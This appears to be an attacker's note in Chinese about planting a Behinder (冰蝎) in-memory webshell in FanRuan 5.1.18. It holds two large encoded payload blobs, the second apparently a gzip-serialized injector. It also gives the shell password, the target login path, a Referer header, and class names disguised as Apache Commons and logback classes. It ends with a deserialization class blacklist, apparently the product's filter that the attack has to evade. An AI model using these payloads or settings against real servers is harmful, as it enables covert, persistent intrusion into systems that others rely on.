QRaa/GwMYeHKEZAU0nwbjxAkfa4NaF9Pe7KyfRZhaI1djdKuEBkoiAfos7DR6l957X8pShMDRNdn/ZbT5EB7cdxTv8IK2jPeGghewjuxSv9twCAo0Bo74dXHX67BT8Jfs6cgEOXtHlaC+aQ+jAdxW9HNLrbYFqjO3wVjhVPwPHLcHKbfBFOTZh9GYlm8dO+fBmWl7dgJWJ4ASwEomdfAAz1J+ENeLNOILZ87jI8uj6zfG5pZgvcm9f+YhNmIs8jlxkwgw1ux88l5PMAHMLrffiN3j0I98AZvD4EK7CMdOeQ0gCrYILTSLWMVA+iFG+AO/DuHlTzTrybxnVn4C64WxPejuP34ucb8W8BR8Zzb8K7MzhyGmauoT2mdTClg/t1yA2+B/e4dSgOUhjgLHJDLaeolkdxaHgVcsXLkI8sphaLV+Atn4MY/kZJ7Oz6zNLMi/bZafvcybmTs08T19LMyTnLum5JtwVvWyxvQfVJ+NS5V+C5Jd1i/Qo0F1v0IuLlc5BZ1y/pt0B+AboE1g8tHZqY7p30Dm23Pr+kX5rfgsEO/eGlwzv0C0sLE/oovaP0R5YOLx1B+ti5l+H0uS14+xb85OJPaTIcNpx7Ad47Bfm9U+/fP7V57bnNa2/fhD4V/p+8DJL2qdH+zOLPIe2H4NTeoV/Qlge1ocUPUr1+ES//n5u/Z45svvbiJhxbn7kKv1RcmrkMH3rJcAndcTupk+YOUGR0NYAV9AiJUwiJ28GBAHGCG9ahAG+GPjyKR2sXbOLIc+CBL4AXXgU/fA024K8hAH8DQfgmhODvIELugCg5CzHyGMTJBiQwpyVJGRykjr1LEzKkBVmMtbwGuirGyiby9uD+R3CHtyFfH0ZOHzrI/Q6cLcAHcA8fSmYmZtwpCDrkMI97hWk8kuEEknrSmcD0FGEhAlGMwNsJMwHxNmDHVNuAjcPRa/hFtw3YmA4SeMU2Dl6Dx3WQ0kEGYfwaGLUJev9DWMX778Pp78LU92Bq6tyydj9LUX5YC3k9bvcUppePwb+k/wcFT+Pfw/DIOMJJG1ODHsffT6JX4JPo4hjC+LBB896/jp3DmL+8BVe34MXoJlQwwLfgc1fgt6/A767PLn5i8ffmPgsXi9OLr6aLM5+EP0gXZ+l1C/54fW5pDjPBf1iaO4ckieL00iySTF+BryHN0uyL9GYLvvE5uDgOIsp+dn327CUU7iTa7z70+APwTng3/CqKTxHxKBzD6xM4/xYM87eidy4gZRlpBaRmkZoDC/ovATXso+swAh7XN5FDA94LLc27KVTVAjH4V/AMprUEJppN+DU0wAj/fh0+jgZ5ALlOPAnvn3iS3lGvYd+GnGg6mkIJLsJvwLMoG/WbAWZ+BCc1n3wCfXb7NZRvVnNiYjxIUw7Rwa9+X0vOj8HjyIJa/xReaZ5tLxvOjgNmC/7rkzDzvGHxv82MTZtIz2gGPJu+Av89vwkbMcPit7Xk9B38pYnpCnx3fZamrqXZy/ADannk9cO8YfG1CYvvTFgszW2RKY0Nzcy3oOgGlGts3hUNKx00sowzXZy7iLM9zJF9DLkBhtoQQTyCNLwDJPhJzZwBlH0dg/Mv4C/RYC7k8VcI+FmkexMG4X9Go57FQKLmnKY67pizPTEnvRubkxpxHqZvKaGhfoBrtksVWo2eIsfWgm+P8zUE91ogdo7qP6PpP0P1H2fppdktMv803L00exK1PjI27lktGc3OPEvT0LWvTT9L/61OU/+NWhC8C1H1bjgB78GYfC+q/z501ftRsfdixP/0jsr3wgNkmsygeijKjlLBHaWCZJbQensEg4yaZho52jXTzCBfg2aaWU3le2D6Gi7XbUPlmA6+owV+Dvnc/X2k2jWEnj5NmcCGVnuKUOkEufUKuS1iOEGWJr4+lt4id2D4vjh2+fI4yl7F30vRE+SuCfU900iNhAQ/E0gRo+n6BHnjXibnbuSgqXcW6/R2mj6tGeHnUKifx9FfQAR8APHwQTTGL2rmsqEK9J3KUQwugqMPkGNa+lsBF7kFcTFFlSDHCeWyisVtTEeT4ylNVVxJFnFEm9PuqNmw1WnRiDqsoWaG3Kdlt6cwKH8HXp5g5U9g7KBHrxJj8TKxRa4Sc3H5MnFErxJr8exlsh47TuC39OsztGUhjxbtsx+GY4almemTiBzsYL5p2CL+SzsAuUvj+iF0w4fhOO51Gj6Cnvtl1PpjWJae1rR9dLwjuR/TC827dvIAeRBlPg7nyBnyEEp2Gu4jy8SAPO+FO7EoPYNSLmNzdw7hNIYERgOFBGaPV3XEqCNmHbHiPcAP6bu53RZOTx/JT3TN4yeNsOPLhiskFj2L+iTPLm+R1CUt4S9pPSIleAYF3EQmv6aJe894EdbEOzQEHycBQrvIOThMgiS0p2NE9NHjzWS7V3AdRd8ZLAZvj559GZbOoq2KsXN033OXYme3yBPRzWt/e5VkiobL5C0vaY3ZSayDmX1t4LOo8m/i3XOYdC7BrfA8Ov2T2Jd+CuX5NEbL1g6EjmGNpRJN4+wshEhWk/zMjuRnJpLPYuKheXxqp75qIwiccYo5AtM/pKa9mNCRjH5bPRTrDH3PMlHPjWMUl0eXDTRKaIRgytw15ZwWBZ/RhDs1piRvnQhylFzQBNmuux9FpHwM+9sSfGvMfeo2rYMFeHX583DxSZhfxhK4CTpqyvUZsj67NIMJfPYVqCzNvQwXzr4CHpq1W+u6abv+pH5J9+LTsLKkO6m3bBERrd55EpYmX7svfgiOaPfrs5tw6D16THFf2oSFpTlaW/4YB6/9OhZb5PbE+tzmtY/QXRauwkepj3ovLc3Scj0W6vTSLMGE8I1L6zqtSdNtkeFlMkKa5YOGUaP7sWp0NW1/BQv2U+jCz8BV/BzHjohZHuBFdPFL6MDP47cv4IrfRru8jCX4FexGfhdL9u9hYX8VG65XsIj/PqL7i8jzj5Drl7AC/SF9JAs/hVH9Pjx1/Sz8GeaXLyP/r+BuX0VY/znu+HXc8RvwWUy51DMjoC9RrVqi1uMudvI2bL50yEuHACrj9RmEQwhbMx2u2b5Dv+yA6tWJL+ldhXCap18lVS2h34rgpECboXAlNQyoWdTqOWwpP474oFAzwtGjHkTaa6DHqw7+FK8/gtt0hCdnvwezU3ps0D56+Ai2cE8d3cDLHsjQVKYnP7FzCLtf2xrg0FWYwlT2dqze9PyypGU/OnUvLkTAt1WYZhim3ScwoP+IfWTwfwEoqT/KUS8AAA==

帆软 5.1.18 打冰蝎内存马

密码: Oknfbivaa
地址: /webroot/decision/login
请求头: Referer: Reudjmcj
脚本类型: JSP
内存马类名: org.apache.commons.lang.AbstractMatcherSjpListener
注入器类名: ch.qos.logbacke.StringUtil

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

反序列化类黑名单

bsh.XThis
bsh.Interpreter
com.mchange.v2.c3p0.PoolBackedDataSource
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
clojure.lang.PersistentArrayMap
clojure.inspector.proxy$javax.swing.table.AbstractTableModel$ff19274a
org.apache.commons.beanutils.BeanComparator
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.functors.ConstantTransformer
org.apache.commons.collections.functors.InstantiateTransformer
org.apache.commons.collections.map.LazyMap
org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.keyvalue.TiedMapEntry
org.apache.commons.collections.map.TransformedMap
org.apache.commons.collections.functors.MapTransformer
org.apache.commons.collections.comparators.TransformingComparator
org.apache.commons.collections4.Transformer
org.apache.commons.collections4.comparators.TransformingComparator
org.apache.commons.collections4.functors.InvokerTransformer
org.apache.commons.collections4.functors.ChainedTransformer
org.apache.commons.collections4.functors.ConstantTransformer
org.apache.commons.collections4.functors.InstantiateTransformer
org.apache.commons.collections4.map.LazyMap
org.apache.commons.collections4.keyvalue.TiedMapEntry
org.apache.commons.collections4.map.TransformedMap
org.apache.commons.collections4.functors.MapTransformer
org.apache.commons.fileupload.disk.DiskFileItem
org.apache.commons.io.output.DeferredFileOutputStream
org.apache.commons.io.output.ThresholdingOutputStream
com.fr.third.org.apache.commons.beanutils.BeanComparator
com.fr.third.org.apache.commons.collections.Transformer
com.fr.third.org.apache.commons.collections.comparators.TransformingComparator
com.fr.third.org.apache.commons.collections.functors.ChainedTransformer
com.fr.third.org.apache.commons.collections.functors.ConstantTransformer
com.fr.third.org.apache.commons.collections.functors.InstantiateTransformer
com.fr.third.org.apache.commons.collections.map.LazyMap
com.fr.third.org.apache.commons.collections.functors.MapTransformer
com.fr.third.org.apache.commons.collections.functors.InvokerTransformer
com.fr.third.org.apache.commons.collections.keyvalue.TiedMapEntry
com.fr.third.org.org.apache.commons.collections.map.TransformedMap
com.fr.third.org.apache.commons.collections4.comparators.TransformingComparator
com.fr.third.org.apache.commons.collections4.functors.InvokerTransformer
com.fr.third.org.apache.commons.collections4.functors.ChainedTransformer
com.fr.third.org.apache.commons.collections4.functors.ConstantTransformer
com.fr.third.org.apache.commons.collections4.functors.InstantiateTransformer
com.fr.third.org.apache.commons.collections4.keyvalue.TiedMapEntry
com.fr.third.org.org.apache.commons.collections4.map.TransformedMap
com.fr.third.org.apache.commons.collections4.map.LazyMap
com.fr.third.org.apache.commons.collections4.functors.MapTransformer
com.fr.third.org.apache.commons.collections4.Transformer
com.fr.third.org.apache.commons.fileupload.disk.DiskFileItem
com.fr.third.org.apache.commons.io.output.DeferredFileOutputStream
com.fr.third.org.apache.commons.io.output.ThresholdingOutputStream
org.apache.wicket.util.upload.DiskFileItem
org.apache.wicket.util.io.DeferredFileOutputStream
org.apache.wicket.util.io.ThresholdingOutputStream
org.codehaus.groovy.runtime.ConvertedClosure
org.codehaus.groovy.runtime.MethodClosure
org.hibernate.engine.spi.TypedValue
org.hibernate.tuple.component.AbstractComponentTuplizer
org.hibernate.tuple.component.PojoComponentTuplizer
org.hibernate.type.AbstractType
org.hibernate.type.ComponentType
org.hibernate.type.Type
org.hibernate.EntityMode
com.fr.third.org.hibernate.engine.spi.TypedValue
com.fr.third.org.hibernate.tuple.component.AbstractComponentTuplizer
com.fr.third.org.hibernate.tuple.component.PojoComponentTuplizer
com.fr.third.org.hibernate.type.AbstractType
com.fr.third.org.hibernate.type.ComponentType
com.fr.third.org.hibernate.type.Type
com.fr.third.org.hibernate.EntityMode
com.sun.rowset.JdbcRowSetImpl
org.jboss.interceptor.builder.InterceptionModelBuilder
